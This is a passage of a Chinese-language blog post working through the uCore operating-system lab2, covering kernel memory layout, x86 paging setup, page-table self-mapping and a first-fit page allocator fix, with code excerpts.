class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">. = <span class="built_in">ALIGN</span>(<span class="number">0x1000</span>);</span><br><span class="line">.data.pgdir : &#123;</span><br><span class="line">    *(.data.pgdir)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">PROVIDE</span>(edata = .);</span><br><span class="line"></span><br><span class="line">.bss : &#123;</span><br><span class="line">    *(.bss)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">PROVIDE</span>(end = .);</span><br><span class="line"></span><br><span class="line">/DISCARD/ : &#123;</span><br><span class="line">    *(.eh_frame .note.GNU-stack)</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 脚本文件的结尾</span></span><br></pre></td></tr></table></figure><p><code>edata</code>表示<code>kernel</code>的<code>data</code>段结束地址；<code>end</code>表示<code>bss</code>段的结束地址（即整个<code>kernel</code>的结束地址）</p><p><code>edata[]</code>和 <code>end[]</code>这些变量是ld根据kernel.ld链接脚本生成的全局变量，表示相应段的结束地址，它们不在任何一个.S、.c或.h文件中定义，但仍然可以在源码文件中使用。</p></li></ul><h3 id="3-uCore的内存空间布局">3) uCore的内存空间布局</h3><ul><li><p>在uCore中，CPU先在bootasm.S（实模式）中通过调用BIOS中断，将物理内存的相关描述符写入特定位置<code>0x8000</code>，然后读入kernel至物理地址<code>0x10000</code>、虚拟地址<code>0xC0000000</code>。</p></li><li><p>而kernel在<code>page_init</code>函数中，读取物理内存地址<code>0x8000</code>处的内存，查找最大物理地址，并计算出所需的<strong>页面数</strong>。虚拟页表<code>VPT(Virtual Page Table)</code>的地址紧跟<code>kernel</code>，其地址为4k对齐。虚拟地址空间结构如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment"> * Virtual memory map:                                          Permissions</span></span><br><span class="line"><span class="comment"> *                                                              kernel/user</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *     4G -----------&gt; +---------------------------------+</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |         Empty Memory (*)        |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     +---------------------------------+ 0xFB000000</span></span><br><span class="line"><span class="comment"> *                     |   Cur. Page Table (Kern, RW)    | RW/-- PTSIZE</span></span><br><span class="line"><span class="comment"> *     VPT ----------&gt; +---------------------------------+ 0xFAC00000</span></span><br><span class="line"><span class="comment"> *                     |        Invalid Memory (*)       | --/--</span></span><br><span class="line"><span class="comment"> *     KERNTOP ------&gt; +---------------------------------+ 0xF8000000</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |    Remapped Physical Memory     | RW/-- KMEMSIZE</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *     KERNBASE -----&gt; +---------------------------------+ 0xC0000000</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span></span><br><span class="line"><span class="comment"> * (*) Note: The kernel ensures that &quot;Invalid Memory&quot; is *never* mapped.</span></span><br><span class="line"><span class="comment"> *     &quot;Empty Memory&quot; is normally unmapped, but user programs may map pages</span></span><br><span class="line"><span class="comment"> *     there if desired.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * */</span></span><br></pre></td></tr></table></figure><p>完成<strong>物理内存页管理初始化工作</strong>后，其物理地址的分布空间如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">+----------------------+ &lt;- <span class="number">0xFFFFFFFF</span>(<span class="number">4</span>GB)       ----------------------------  <span class="number">4</span>GB</span><br><span class="line">|  一些保留内存，例如用于|                                保留空间</span><br><span class="line">|   <span class="number">32</span>bit设备映射空间等  |</span><br><span class="line">+----------------------+ &lt;- 实际物理内存空间结束地址 ----------------------------</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">|     用于分配的         |                                 可用的空间</span><br><span class="line">|    空闲内存区域        |</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">+----------------------+ &lt;- 空闲内存起始地址      ----------------------------  </span><br><span class="line">|     VPT页表存放位置      |                                VPT页表存放的空间   (<span class="number">4</span>MB左右)</span><br><span class="line">+----------------------+ &lt;- bss段结束处           ----------------------------</span><br><span class="line">|uCore的text、data、bss |                              uCore各段的空间</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00100000</span>(<span class="number">1</span>MB)       ---------------------------- <span class="number">1</span>MB</span><br><span class="line">|       BIOS ROM       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000F0000</span>(<span class="number">960</span>KB)</span><br><span class="line">|     <span class="number">16</span>bit设备扩展ROM  |                             显存与其他ROM映射的空间</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000C0000</span>(<span class="number">768</span>KB)</span><br><span class="line">|     CGA显存空间       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000B8000</span>            ---------------------------- <span class="number">736</span>KB</span><br><span class="line">|        空闲内存       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00011000</span>(<span class="number">+4</span>KB)          uCore header的内存空间</span><br><span class="line">| uCore的ELF header数据 |</span><br><span class="line">+----------------------+ &lt;<span class="number">-0x00010000</span>             ---------------------------- <span class="number">64</span>KB</span><br><span class="line">|       空闲内存        |</span><br><span class="line">+----------------------+ &lt;- 基于bootloader的大小          bootloader的</span><br><span class="line">|      bootloader的   |                                    内存空间</span><br><span class="line">|     text段和data段    |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00007C00</span>            ---------------------------- <span class="number">31</span>KB</span><br><span class="line">|   bootloader和uCore  |</span><br><span class="line">|      共用的堆栈       |                                 堆栈的内存空间</span><br><span class="line">+----------------------+ &lt;- 基于栈的使用情况</span><br><span class="line">|     低地址空闲空间    |</span><br><span class="line">+----------------------+ &lt;-  <span class="number">0x00000000</span>           ---------------------------- <span class="number">0</span>KB</span><br></pre></td></tr></table></figure><p>易知，其页表地址之上的物理内存空间是空闲的（除去保留的内存），故将该物理地址之下的物理空间对应的页表全部设置为保留(reserved)。并将这些空闲的内存全部添加进页表项中。</p></li></ul><h3 id="4-段页式存储管理（重要）">4. 段页式存储管理（重要）</h3><blockquote><p>在保护模式中，x86 体系结构将内存地址分成三种：<strong>逻辑地址</strong>（也称<strong>虚拟地址</strong>）、<strong>线性地址</strong>和<strong>物理地址</strong>。</p></blockquote><ul><li>段式存储在内存保护方面有优势，页式存储在内存利用和优化转移到后备存储方面有优势。</li><li>在段式存储管理基础上，给每个段加一级页表。同时，通过指向相同的页表基址，实现进程间的段共享。</li><li>在段页式管理中，操作系统弱化了段式管理中的功能，实现以分页为主的内存管理。段式管理只起到了一个过滤的作用，它将地址不加转换直接映射成线性地址。将虚拟地址转换为物理地址的过程如下：<ul><li>根据段寄存器中的段选择子，获取GDT中的特定基址并加上目标偏移来确定<strong>线性地址</strong>。由于GDT中所有的基址全为0（因为弱化了段式管理的功能，对等映射），所以此时的逻辑地址和线性地址是相同的。</li><li>根据该线性地址，获取对应页表项，并根据该页表项来获取对应的物理地址。</li></ul></li><li><strong>一级页表（页目录表PageDirectoryTable, PDT）的起始地址存储于<code>%cr3</code>寄存器中。</strong></li></ul><h4 id="a-启动页机制（重要）">a. 启动页机制（重要）</h4><p>启动页机制的代码很简单，其对应的汇编代码为</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"># labcodes/lab2/kern/init/entry<span class="number">.</span>S</span><br><span class="line"><span class="symbol">kern_entry:</span></span><br><span class="line">    # load pa of boot pgdir</span><br><span class="line">    movl $REALLOC(__boot_pgdir), %eax</span><br><span class="line">    movl %eax, %cr3</span><br><span class="line">    # enable paging</span><br><span class="line">    movl %cr0, %eax</span><br><span class="line">    orl $(CR0_PE | CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_TS | CR0_EM | CR0_MP), %eax</span><br><span class="line">    andl $~(CR0_TS | CR0_EM), %eax</span><br><span class="line">    movl %eax, %cr0</span><br><span class="line"></span><br><span class="line">    # update <span class="built_in">eip</span></span><br><span class="line">    # now, <span class="built_in">eip</span> = 0x1xxxxx</span><br><span class="line">    leal next, %eax</span><br><span class="line">    # set <span class="built_in">eip</span> = KERNBASE + 0x1xxxxx</span><br><span class="line">    <span class="keyword">jmp</span> *%eax</span><br><span class="line"><span class="symbol">next:</span></span><br><span class="line">  # .....省略剩余代码</span><br><span class="line"></span><br><span class="line"># kernel builtin pgdir</span><br><span class="line"># an initial page directory (Page Directory Table, PDT)</span><br><span class="line"># These page directory table <span class="keyword">and</span> page table can be reused!</span><br><span class="line"><span class="meta">.section</span> .data<span class="number">.</span>pgdir</span><br><span class="line"><span class="meta">.align</span> PGSIZE</span><br><span class="line"><span class="symbol">__boot_pgdir:</span></span><br><span class="line"><span class="meta">.globl</span> __boot_pgdir</span><br><span class="line">    # map va <span class="number">0</span> ~ 4M to pa <span class="number">0</span> ~ 4M (temporary)</span><br><span class="line"><span class="meta">    .long</span> REALLOC(__boot_pt1) + (PTE_P | PTE_U | PTE_W)</span><br><span class="line"><span class="meta">    .space</span> (KERNBASE &gt;&gt; PGSHIFT &gt;&gt; <span class="number">10</span> &lt;&lt; <span class="number">2</span>) - (. - __boot_pgdir) # pad to PDE of KERNBASE</span><br><span class="line">    # map va KERNBASE + (<span class="number">0</span> ~ 4M) to pa <span class="number">0</span> ~ 4M</span><br><span class="line"><span class="meta">    .long</span> REALLOC(__boot_pt1) + (PTE_P | PTE_U | PTE_W)</span><br><span class="line"><span class="meta">    .space</span> PGSIZE - (. - __boot_pgdir) # pad to PGSIZE</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">.set</span> i, <span class="number">0</span></span><br><span class="line"><span class="symbol">__boot_pt1:</span></span><br><span class="line"><span class="meta">.rept</span> <span class="number">1024</span></span><br><span class="line"><span class="meta">    .long</span> i * PGSIZE + (PTE_P | PTE_W)</span><br><span class="line"><span class="meta">    .set</span> i, i + <span class="number">1</span></span><br><span class="line"><span class="meta">.endr</span></span><br></pre></td></tr></table></figure><ul><li><p>首先，将一级页表 <strong>__boot_pgdir</strong>  （页目录表PDT）的<strong>物理</strong>基地址加载进<code>%cr3</code>寄存器中。</p><ul><li><p>该一级页表<strong>暂时</strong>将虚拟地址 <strong>0xC0000000 + (0~4M)</strong> 以及虚拟地址 <strong>(0~4M)</strong>   设置为物理地址 <strong>(0-4M)</strong> 。</p><p>之后会重新设置一级页表的映射关系。</p><blockquote><p>为什么要将两段虚拟内存映射到同一段物理地址呢？思考一下，答案就在下方。</p></blockquote></li></ul></li><li><p>之后，设置<code>%cr0</code>寄存器中<strong>PE、PG、AM、WP、NE、MP</strong>位，关闭<strong>TS</strong> 与<strong>EM</strong> 位，以启动分页机制。</p><blockquote><p>先介绍一下<code>%cr0</code>寄存器主要3个标志位的功能：</p><ul><li><strong>P</strong>rotection <strong>E</strong>nable: 启动保护模式，默认只是打开分段。</li><li><strong>P</strong>a<strong>g</strong>ing: 设置分页标志。只有PE和PG位同时置位，才能启动分页机制。</li><li><strong>W</strong>rite <strong>P</strong>rotection: 当该位为1时，CPU会禁止ring0代码向read only page写入数据。这个标志位主要与<strong>写时复制</strong>有关系。</li></ul><p>除<strong>PE</strong>、<strong>PG</strong>与<strong>WP</strong> 的<strong>其他</strong>标志位与分页机制关联不大，其设置或清除的原因盲猜可能是通过启动分页机制这个机会来<strong>顺便做个初始化</strong>。</p></blockquote><blockquote><p>当改变PE和PG位时，必须小心。只有<strong>当执行程序至少有部分代码和数据在线性地址空间和物理地址空间中具有相同地址时，我们才能改变PG位的设置</strong>。</p><p>因为当<code>%cr0</code>寄存器一旦设置，则<strong>分页机制立即开启</strong>。此时这部分具有相同地址的代码在分页和未分页之间起着桥梁的作用。无论是否开启分页机制，这部分代码都必须具有相同的地址。</p><p>而这一步的操作能否成功，关键就在于一级页表的设置。一级页表将虚拟内存中的两部分地址<strong>KERNBASE+(0-4M)</strong> 与 <strong>(0-4M)</strong> 暂时都映射至物理地址 <strong>(0-4M)</strong> 处，这样就可以满足上述的要求。</p></blockquote></li><li><p>最后，<strong>必须</strong>来个简单的<code>jmp</code>指令，将<code>eip</code>从物理地址“修改”为虚拟地址。</p><blockquote><p>在修改该了PE位之后程序必须立刻使用一条跳转指令，以刷新处理器执行管道中已经获取的不同模式下的任何指令。</p></blockquote></li></ul><h4 id="b-uCore段页机制启动过程">b. uCore段页机制启动过程</h4><ul><li>bootloader在启动保护模式前，会设置一个临时GDT以便于进入CPU保护模式后的bootloader和uCore所使用。</li><li>uCore被bootloader加载进内存后，在<code>kern_entry</code>中启动页机制。</li><li>在<code>pmm_init</code>中建立双向链表来管理物理内存，并设置一级页表（页目录表）与二级页表。</li><li>最后重新加载新的GDT。</li></ul><blockquote><p>lab2相对于lab1，新增了页机制相关的处理过程，其他过程没有改变。</p></blockquote><h4 id="c-uCore物理页结构">c. uCore物理页结构</h4><ul><li><p>uCore中用于管理物理页的结构如下所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment">* struct Page - Page descriptor structures. Each Page describes one</span></span><br><span class="line"><span class="comment">* physical page. In kern/mm/pmm.h, you can find lots of useful functions</span></span><br><span class="line"><span class="comment">* that convert Page to other data types, such as phyical address.</span></span><br><span class="line"><span class="comment">* */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">Page</span> &#123;</span><br><span class="line">  <span class="type">int</span> ref;                <span class="comment">// 当前页被引用的次数，与内存共享有关</span></span><br><span class="line">  <span class="type">uint32_t</span> flags;         <span class="comment">// 标志位的集合，与eflags寄存器类似</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> property;  <span class="comment">// 空闲的连续page数量。这个成员只会用在连续空闲page中的第一个page</span></span><br><span class="line">  <span class="type">list_entry_t</span> page_link; <span class="comment">// 两个分别指向上一个和下一个非连续空闲页的指针。</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>目前在lab2中，flags可以设置的位只有<code>reserved</code>位和<code>Property</code>位。</p><blockquote><p><code>reserved</code>位表示当前页是否被保留，一旦保留该页，则该页无法用于分配；</p><p><code>Property</code>位表示当前页是否已被分配，为1则表示已分配。</p></blockquote></li><li><p>所有的数据结构Page都存放在<strong>一维Page结构数组</strong>中。但请注意，这并非虚拟页表（VPT），即该<strong>一维Page结构数组并非分页机制用于<em>将虚拟地址转换为物理地址</em>这个过程所用到的一级与二级页表</strong>，它们只是用于设置对应物理页表的相关属性，例如当前物理页表被二级页表的引用次数等等。</p></li><li><p>同时，该一维Page结构数组的存储位置与虚拟页表VPT的存储位置不同。前者的起始存储地址为kernel结尾地址向上4k对齐后的第一个物理页面，而后者则存储于指定虚拟地址<code>0xFAC00000</code>。</p></li><li><p>页目录表使用<strong>线性地址</strong>的首部(PDX, 10bit)作为索引，二级页表使用<strong>线性地址</strong>的中部(PTX, 10bit)作为索引，而Page结构数组使用<strong>物理地址</strong>的首部与中部(PPN, 20bit)作为索引（注意是<strong>物理</strong>地址）。</p></li><li><p>为了加快查找，所有连续空闲pages中的第一个Page结构都会构成一个双向链表。相互链接，其第一个结点是<code>free_area.free_list</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* free_area_t - maintains a doubly linked list to record free (unused) pages */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">list_entry_t</span> free_list;         <span class="comment">// the list header</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> nr_free;           <span class="comment">// # of free pages in this free list</span></span><br><span class="line">&#125; <span class="type">free_area_t</span>;</span><br><span class="line"><span class="type">free_area_t</span> free_area;</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-虚拟页表结构">d. 虚拟页表结构</h4><p>每个页表项（PTE）都由一个32位整数来存储数据，其结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">      <span class="number">31</span><span class="number">-12</span>      <span class="number">9</span><span class="number">-11</span>     <span class="number">8</span>    <span class="number">7</span>    <span class="number">6</span>   <span class="number">5</span>   <span class="number">4</span>      <span class="number">3</span>    <span class="number">2</span>   <span class="number">1</span>   <span class="number">0</span></span><br><span class="line">+--------------+-------+-----+----+---+---+-----+-----+---+---+---+</span><br><span class="line">|     Offset   | Avail | MBZ | PS | D | A | PCD | PWT | U | W | P |</span><br><span class="line">+--------------+-------+-----+----+---+---+-----+-----+---+---+---+</span><br></pre></td></tr></table></figure><ul><li><p>0 - <strong>P</strong>resent: 表示当前PTE所指向的物理页面是否驻留在内存中</p></li><li><p>1 - <strong>W</strong>riteable: 表示是否允许读写</p></li><li><p>2 - <strong>U</strong>ser: 表示该页的访问所需要的特权级。即User(ring 3)是否允许访问</p></li><li><p>3 - <strong>P</strong>age<strong>W</strong>rite<strong>T</strong>hough:  表示是否使用write through缓存写策略</p></li><li><p>4 - <strong>P</strong>age<strong>C</strong>ache<strong>D</strong>isable: 表示是否<strong>不对</strong>该页进行缓存</p></li><li><p>5 - <strong>A</strong>ccess: 表示该页是否已被访问过</p></li><li><p>6 - <strong>D</strong>irty: 表示该页是否已被修改</p></li><li><p>7 - <strong>P</strong>age<strong>S</strong>ize: 表示该页的大小</p></li><li><p>8 - <strong>M</strong>ust<strong>B</strong>e<strong>Z</strong>ero: 该位必须保留为0</p></li><li><p>9-11 - <strong>Avail</strong>able: 第9-11这三位并没有被内核或中断所使用，可保留给OS使用。</p></li><li><p>12-31 - Offset: 目标地址的后20位。</p><blockquote><p>因为目标地址以4k作为对齐标准，所以该地址的低12位永远为0，故这12位空间可用于设置标志位。</p></blockquote></li></ul><h4 id="e-自映射">e. 自映射</h4><ul><li><p>自映射的好处</p><ul><li>当页目录与页表建立完成后，如果需要按虚拟地址的地址<strong>顺序显示整个页目录表和页表的内容</strong>，则要查找页目录表的页目录表项内容，并根据页目录表项内容找到页表的物理地址，再转换成对应的虚地址，然后访问页表的虚地址，搜索整个页表的每个页目录项。这样的过程比较繁琐，而自映射可以改善这个过程。</li><li>节省4KB空间</li><li>方便用户态程序访问页表，可以用这种方式实现一个用户地址空间的映射</li></ul></li><li><p>页表自映射的关键点</p><ul><li><p>把所有的页表（4KB * 1024个）放到<strong>连续</strong>的4MB <strong>虚拟地址</strong> 空间中，并且要求这段空间4MB对齐，这样，<strong>就会有一张虚拟页的内容与页目录的内容完全相同</strong>。</p></li><li><p>页目录结构必须和页表结构相同。</p></li><li><p>此时在页目录表中，会存在一个页目录条目，该页目录条目指向某个二级页表。而该二级页表的物理地址，正是页目录表所处于物理页的<strong>物理</strong>地址。</p><p>即，页目录表中存在一个页目录条目，该条目内含的物理地址就是页目录表本身的物理地址。</p><p>uCore中的这条代码证实了这个结论:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// recursively insert boot_pgdir in itself</span></span><br><span class="line"><span class="comment">// to form a virtual page table at virtual address VPT</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// PDX(VPT)为4MB虚拟页表所对应的PageDirectoryIndex</span></span><br><span class="line">boot_pgdir[<span class="built_in">PDX</span>(VPT)] = <span class="built_in">PADDR</span>(boot_pgdir) | PTE_P | PTE_W;</span><br></pre></td></tr></table></figure><p>而下面这张图演示了其指向过程:</p><blockquote><p>注意页目录表此时存储于VPT的4MB范围中。</p></blockquote><pre class="mermaid">    graph LR;PDT-->PT1PDT-->PT2/PDTPT1-->PhyPage1PT1-->PhyPage2PT2/PDT-->PhyPage3/PT1PT2/PDT-->PhyPage4/PT2</pre></li></ul></li><li><p>参考：<a href="https://blog.csdn.net/u010513059/article/details/80311248">页表自映射</a></p></li></ul><h3 id="5-uCore栈的迁移">5) uCore栈的迁移</h3><ul><li><p>在原先的lab1中，bootloader所设置的栈起始地址为<code>0x7c00</code>，之后的uCore的代码也沿用了这个栈，但仍然划分出了一个全局数组作为TSS上的ring0栈地址（该全局数组位于uCore的bss段）。</p><blockquote><p>注意此时的<strong>两个</strong>内核栈是不一样的，一个是中断外使用的栈，另一个是中断内使用的栈。</p></blockquote></li><li><p>而在lab2中，栈稍微做了一些改变。bootloader所设置的栈起始地址仍然为<code>0x7c00</code>，但在将uCore加载进内存之后，在<code>kern_entry</code>中，该部分代码在启动页机制后将栈设置为uCore data段上的一个全局数组的末尾地址<code>bootstacktop</code>（8KB），并也在<code>gdt_init</code>将TSS ring0栈地址设置为了<code>bootstacktop</code>。</p><blockquote><p>与Lab1不同，之后内核可以使用的内核栈只有一个。</p></blockquote><blockquote><p>中断处理程序可能会从高地址开始，向下覆盖ring3的栈数据。这个漏洞可能是因为未完全实现的内存管理机制所导致的。</p></blockquote></li></ul><h2 id="2-练习解答">2. 练习解答</h2><h3 id="1-练习0">1) 练习0</h3><blockquote><p><strong>填写已有实验</strong>，将完成的实验1中的代码添加进实验2中。</p></blockquote><p>这个没什么好说的，一个个照搬就成。</p><h3 id="2-练习1">2) 练习1</h3><blockquote><p><strong>实现 first-fit 连续物理内存分配算法</strong>。</p></blockquote><p>原先的uCore实验2代码中几乎已经完全实现了first-fit算法，但其中仍然存在一个问题，以至于无法通过check。什么问题呢：</p><blockquote><p><code>first-fit</code>算法要求将空闲内存块<strong>按照地址从小到大的方式</strong>连起来。</p></blockquote><p>但uCore中的代码没有实现这一点。所以要手动修改相关的代码。</p><ul><li><p><code>default_init_memmap</code></p><ul><li><p>该函数将新页面插入链表时，没有按照地址顺序插入</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li><li><p>故需要修改该行代码，使其按地址顺序插入至双向链表中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add_before</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>default_alloc_pages</code></p><ul><li><p>在原先的代码中，当获取到了一个大小足够大的页面地址时，程序会先将该页头从链表中断开，切割，并将剩余空间放回链表中。但将<em>剩余空间放回链表</em>时，并没有按照地址顺序插入链表。</p><blockquote><p>连续空闲页面中的第一个页称为页头，page header。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    <span class="keyword">if</span> (page-&gt;property &gt; n) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + n;</span><br><span class="line">        p-&gt;property = page-&gt;property - n;</span><br><span class="line">        <span class="comment">// 注意这一步</span></span><br><span class="line">        <span class="built_in">list_add</span>(&amp;free_list, &amp;(p-&gt;page_link));</span><br><span class="line">    &#125;</span><br><span class="line">    nr_free -= n;</span><br><span class="line">    <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是修改后的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (page-&gt;property &gt; n) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + n;</span><br><span class="line">        p-&gt;property = page-&gt;property - n;</span><br><span class="line">        <span class="built_in">SetPageProperty</span>(p);</span><br><span class="line">        <span class="comment">// 注意这一步add after</span></span><br><span class="line">        <span class="built_in">list_add_after</span>(&amp;(page-&gt;page_link), &amp;(p-&gt;page_link));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    nr_free -= n;</span><br><span class="line">    <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>default_free_pages</code></p><ul><li><p>该函数默认会在函数末尾处，将待释放的页头插入至链表的第一个节点。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li><li><p>所以我们需要修改这部分代码，使其按地址顺序插入至对应的链表结点处。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 将空闲页面按地址大小插入至链表中</span></span><br><span class="line"><span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">&#123;</span><br><span class="line">    p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">    <span class="keyword">if</span> (base + base-&gt;property &lt;= p) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(base + base-&gt;property != p);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-练习2">3) 